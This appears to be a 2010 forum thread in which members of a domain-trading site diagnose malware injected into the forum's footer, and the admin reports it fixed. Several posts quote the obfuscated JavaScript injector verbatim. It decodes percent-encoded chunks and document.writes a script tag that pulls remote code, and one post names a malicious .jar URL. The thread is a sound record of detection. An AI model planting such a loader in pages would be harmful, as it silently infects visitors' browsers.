Search for your domain name

stevebrowne · 23-02-2010, 12:55:19 PM

there's something wrong with the footer of the page, as it (a) looks wrong and (b) is forcing each page to the END of the page on each load. PageUp/Dn don't work either initially as if something else has focus. It's OK when I click on the main page area.

fraser · 23-02-2010, 12:57:31 PM

Yep seeing warnings here from ESET too

fraser · 23-02-2010, 01:02:27 PM

something is trying to load

http://binbong. servehttp .com/sdfg.jar

rob · 23-02-2010, 01:04:01 PM

yup at footer of page after the GA stuff is:

var AjPdIJYXLs = "VYojT23VYojT33"; var aPzJSlR0bO0 = "VYojT3cVYojT73VYojT63VYojT72VYo"; var aPzJSlR0bO1 = "jT69VYojT70VYojT74VYojT20VYojT7"; var aPzJSlR0bO2 = "3VYojT72VYojT63VYojT3dVYojT22VY"; var aPzJSlR0bO3 = "ojT68VYojT74VYojT74VYojT70VYojT"; var aPzJSlR0bO4 = "3aVYojT2fVYojT2fVYojT6dVYojT6dV"; var aPzJSlR0bO5 = "YojT66VYojT61VYojT76VYojT2eVYoj"; var aPzJSlR0bO6 = "T73VYojT65VYojT72VYojT76VYojT65"; var aPzJSlR0bO7 = "VYojT68VYojT74VYojT74VYojT70VYo"; var aPzJSlR0bO8 = "jT2eVYojT63VYojT6fVYojT6dVYojT2"; var aPzJSlR0bO9 = "fVYojT2fVYojT6dVYojT6cVYojT2eVY"; var aPzJSlR0bO10 = "ojT70VYojT68VYojT70VYojT22VYojT"; var aPzJSlR0bO11 = "3eVYojT20VYojT3cVYojT2fVYojT73V"; var aPzJSlR0bO12 = "YojT63VYojT72VYojT69VYojT70VYoj"; var aPzJSlR0bO13 = "T74VYojT3e"; var pppxhNzbrz = "TviGq23VYojT33"; var gdplog8PER = aPzJSlR0bO0 + aPzJSlR0bO1 + aPzJSlR0bO2 + aPzJSlR0bO3 + aPzJSlR0bO4 + aPzJSlR0bO5 + aPzJSlR0bO6 + aPzJSlR0bO7 + aPzJSlR0bO8 + aPzJSlR0bO9 + aPzJSlR0bO10 + aPzJSlR0bO11 + aPzJSlR0bO12 + aPzJSlR0bO13; var zy7a7KGjPG = "FOmyW23NBx0Y33"; FUPa52wyIc = gdplog8PER.replace(/VYojT/g,"%"); var la27tUrKdS=unescape;var AjPdIJYXLs = "NBx0Y23TviGq33"; q9124=this; var Y07YuuE3KT= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Y07YuuE3KT.write(la27tUrKdS(FUPa52wyIc)); </script><script type="text/javascript"><!--
try {
var pageTracker = _gat._getTracker("");
pageTracker._initData();

pageTracker._trackPageview();

which is calling the ml.php stuff

Edwin · 23-02-2010, 01:04:54 PM

Almost 100% certain to be an injection exploit from everything that's been posted.

I recommend if you don't have bang spanking new up to date antivirus software running, stop browsing the forum NOW until it's clearer what's going on. Of course, if you haven't seen a warning it may already be too late!

davedevelopment · 23-02-2010, 01:06:30 PM

Quote:

Originally Posted by Edwin

Most likely the site's been hacked with some kind of code injection exploit. The version of vbulletin that's running is pretty old after all, if the version number at the foot of the page is correct.

Yeah, this looks dodgy to me, just above some Google Analytics code at the foot of the page.

UPDATE: My bad, didn't see Rob's post.

Code:

<script
var AjPdIJYXLs = "VYojT23VYojT33"; var aPzJSlR0bO0 = "VYojT3cVYojT73VYojT63VYojT72VYo"; var aPzJSlR0bO1 = "jT69VYojT70VYojT74VYojT20VYojT7"; var aPzJSlR0bO2 = "3VYojT72VYojT63VYojT3dVYojT22VY"; var aPzJSlR0bO3 = "ojT68VYojT74VYojT74VYojT70VYojT"; var aPzJSlR0bO4 = "3aVYojT2fVYojT2fVYojT6dVYojT6dV"; var aPzJSlR0bO5 = "YojT66VYojT61VYojT76VYojT2eVYoj"; var aPzJSlR0bO6 = "T73VYojT65VYojT72VYojT76VYojT65"; var aPzJSlR0bO7 = "VYojT68VYojT74VYojT74VYojT70VYo"; var aPzJSlR0bO8 = "jT2eVYojT63VYojT6fVYojT6dVYojT2"; var aPzJSlR0bO9 = "fVYojT2fVYojT6dVYojT6cVYojT2eVY"; var aPzJSlR0bO10 = "ojT70VYojT68VYojT70VYojT22VYojT"; var aPzJSlR0bO11 = "3eVYojT20VYojT3cVYojT2fVYojT73V"; var aPzJSlR0bO12 = "YojT63VYojT72VYojT69VYojT70VYoj"; var aPzJSlR0bO13 = "T74VYojT3e"; var pppxhNzbrz = "TviGq23VYojT33"; var gdplog8PER = aPzJSlR0bO0 + aPzJSlR0bO1 + aPzJSlR0bO2 + aPzJSlR0bO3 + aPzJSlR0bO4 + aPzJSlR0bO5 + aPzJSlR0bO6 + aPzJSlR0bO7 + aPzJSlR0bO8 + aPzJSlR0bO9 + aPzJSlR0bO10 + aPzJSlR0bO11 + aPzJSlR0bO12 + aPzJSlR0bO13; var zy7a7KGjPG = "FOmyW23NBx0Y33"; FUPa52wyIc = gdplog8PER.replace(/VYojT/g,"%"); var la27tUrKdS=unescape;var AjPdIJYXLs = "NBx0Y23TviGq33"; q9124=this; var Y07YuuE3KT= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Y07YuuE3KT.write(la27tUrKdS(FUPa52wyIc)); </script>

Systreg · 23-02-2010, 01:39:30 PM

Some other sites reporting the same thing in vBulletin, this forum topic about the same thing:

Trojan Horse - Yamaha Grizzly ATV Forum

On page 3 of that topic it gives these 3 links:

Is vBulletin.com Infected by a virus ? - vBulletin.org Forum

*WARNING ABOUT THESE 2 LINKS BELOW*, these are the other 2 links it gives, which I believe are the real vbulletin.com site urls, when I visited them my AVG anti virus gave a virus warning, I've broken the links to prevent accidental clicking:

http://w w w. vbulletin.com/forum/showthread.php?336457-My-vB-3-8-websites-infected-with-Trojan-Downloader-JS-Agent-ewo

http://w w w .vbulletin.com/forum/showthread.php?336433-Malicious-Software

I get no virus warning on Acorn at all, not seeing any of the stuff at the footer of the page either, I'm on Opera browser

Skinner · 23-02-2010, 02:00:52 PM

Seems like its the forum to target firefox. Does anyone WITHOUT firefox have this ?

I use opera myself.

admin · 23-02-2010, 04:28:40 PM

It was a virus attack, via VBSEO (not VB directly).

This has been removed and patched.

Please confirm all OK.

Thanks

Admin

retired_member12 · 23-02-2010, 05:15:17 PM

Yup, back to normal here.

23-02-2010, 12:55:19 PM	#11 (permalink)
stevebrowne Join Date: May 2007 Posts: 845 No Classified Ratings Domain Trader Rating: (100% / 5)	there's something wrong with the footer of the page, as it (a) looks wrong and (b) is forcing each page to the END of the page on each load. PageUp/Dn don't work either initially as if something else has focus. It's OK when I click on the main page area. __________________ Christmas Toys 2011 \| Winter Sport Insurance \| SDXC Cards

23-02-2010, 01:02:27 PM	#13 (permalink)
fraser Join Date: Nov 2005 Posts: 198 No Classified Ratings Domain Trader Rating: (100% / 13)	something is trying to load http://binbong. servehttp .com/sdfg.jar __________________ Home Cinema System

23-02-2010, 01:04:54 PM	#15 (permalink)
Edwin Join Date: Apr 2005 Location: Cambridge, UK Posts: 3,876 No Classified Ratings Domain Trader Rating: (100% / 46)	Almost 100% certain to be an injection exploit from everything that's been posted. I recommend if you don't have bang spanking new up to date antivirus software running, stop browsing the forum NOW until it's clearer what's going on. Of course, if you haven't seen a warning it may already be too late! __________________ Memorable Domains Ltd - Over 7,000 descriptive, generic .co.uk domains for sale Please note: All sale prices over a week old are automatically invalid. No exceptions. Thanks!

23-02-2010, 01:39:30 PM	#17 (permalink)
Systreg Join Date: Oct 2008 Location: County Cork Republic of Ireland Posts: 3,906 No Classified Ratings Domain Trader Rating: (100% / 104)	Some other sites reporting the same thing in vBulletin, this forum topic about the same thing: Trojan Horse - Yamaha Grizzly ATV Forum On page 3 of that topic it gives these 3 links: Is vBulletin.com Infected by a virus ? - vBulletin.org Forum WARNING ABOUT THESE 2 LINKS BELOW, these are the other 2 links it gives, which I believe are the real vbulletin.com site urls, when I visited them my AVG anti virus gave a virus warning, I've broken the links to prevent accidental clicking: http://w w w. vbulletin.com/forum/showthread.php?336457-My-vB-3-8-websites-infected-with-Trojan-Downloader-JS-Agent-ewo http://w w w .vbulletin.com/forum/showthread.php?336433-Malicious-Software I get no virus warning on Acorn at all, not seeing any of the stuff at the footer of the page either, I'm on Opera browser Last edited by Systreg; 23-02-2010 at 01:45:06 PM.

23-02-2010, 02:00:52 PM	#18 (permalink)
Skinner Join Date: Jul 2008 Location: Manchester Posts: 2,501 No Classified Ratings Domain Trader Rating: (100% / 13)	Seems like its the forum to target firefox. Does anyone WITHOUT firefox have this ? I use opera myself. __________________ Browse:

23-02-2010, 12:57:31 PM	#12 (permalink)
fraser Join Date: Nov 2005 Posts: 198 No Classified Ratings Domain Trader Rating: (100% / 13)	Yep seeing warnings here from ESET too

23-02-2010, 01:04:01 PM	#14 (permalink)
rob Founding Member Join Date: Jan 2005 Posts: 5,879 No Classified Ratings Domain Trader Rating: (100% / 37)	yup at footer of page after the GA stuff is: var AjPdIJYXLs = "VYojT23VYojT33"; var aPzJSlR0bO0 = "VYojT3cVYojT73VYojT63VYojT72VYo"; var aPzJSlR0bO1 = "jT69VYojT70VYojT74VYojT20VYojT7"; var aPzJSlR0bO2 = "3VYojT72VYojT63VYojT3dVYojT22VY"; var aPzJSlR0bO3 = "ojT68VYojT74VYojT74VYojT70VYojT"; var aPzJSlR0bO4 = "3aVYojT2fVYojT2fVYojT6dVYojT6dV"; var aPzJSlR0bO5 = "YojT66VYojT61VYojT76VYojT2eVYoj"; var aPzJSlR0bO6 = "T73VYojT65VYojT72VYojT76VYojT65"; var aPzJSlR0bO7 = "VYojT68VYojT74VYojT74VYojT70VYo"; var aPzJSlR0bO8 = "jT2eVYojT63VYojT6fVYojT6dVYojT2"; var aPzJSlR0bO9 = "fVYojT2fVYojT6dVYojT6cVYojT2eVY"; var aPzJSlR0bO10 = "ojT70VYojT68VYojT70VYojT22VYojT"; var aPzJSlR0bO11 = "3eVYojT20VYojT3cVYojT2fVYojT73V"; var aPzJSlR0bO12 = "YojT63VYojT72VYojT69VYojT70VYoj"; var aPzJSlR0bO13 = "T74VYojT3e"; var pppxhNzbrz = "TviGq23VYojT33"; var gdplog8PER = aPzJSlR0bO0 + aPzJSlR0bO1 + aPzJSlR0bO2 + aPzJSlR0bO3 + aPzJSlR0bO4 + aPzJSlR0bO5 + aPzJSlR0bO6 + aPzJSlR0bO7 + aPzJSlR0bO8 + aPzJSlR0bO9 + aPzJSlR0bO10 + aPzJSlR0bO11 + aPzJSlR0bO12 + aPzJSlR0bO13; var zy7a7KGjPG = "FOmyW23NBx0Y33"; FUPa52wyIc = gdplog8PER.replace(/VYojT/g,"%"); var la27tUrKdS=unescape;var AjPdIJYXLs = "NBx0Y23TviGq33"; q9124=this; var Y07YuuE3KT= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Y07YuuE3KT.write(la27tUrKdS(FUPa52wyIc)); </script><script type="text/javascript"><!-- try { var pageTracker = _gat._getTracker(""); pageTracker._initData(); pageTracker._trackPageview(); which is calling the ml.php stuff

23-02-2010, 04:28:40 PM	#19 (permalink)
admin Administrator Join Date: Jun 2004 Posts: 8,517 No Classified Ratings Domain Trader Rating: (100% / 1)	It was a virus attack, via VBSEO (not VB directly). This has been removed and patched. Please confirm all OK. Thanks Admin __________________ Domain Appraisal \| Domain Escrow Service \| UK Appliances \| Surrey Deals \| Domain Auctions from Acorn Domains Subscribe to our Domains For Sale newsletter :: Submit a Domain For Sale to our newsletter :: Domains For Sale

23-02-2010, 05:15:17 PM	#20 (permalink)
retired_member12 Join Date: Aug 2006 Posts: 1,510 No Classified Ratings Domain Trader Rating: (0% / 0)	Yup, back to normal here.

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Domain Name Community	Replies	Last Post
Its a numbers thing - Time for a new forum maybe?	mxm	Forum News & Feedback	6	07-11-2007 02:11:11 AM
Traffic Domain Names - Forum	Kieron	Forum News & Feedback	1	20-12-2005 11:08:41 PM
Acorn Domains Forum Terms and Conditions of use	AcornDomains.co.uk	Forum News & Feedback	0	23-02-2005 10:53:27 PM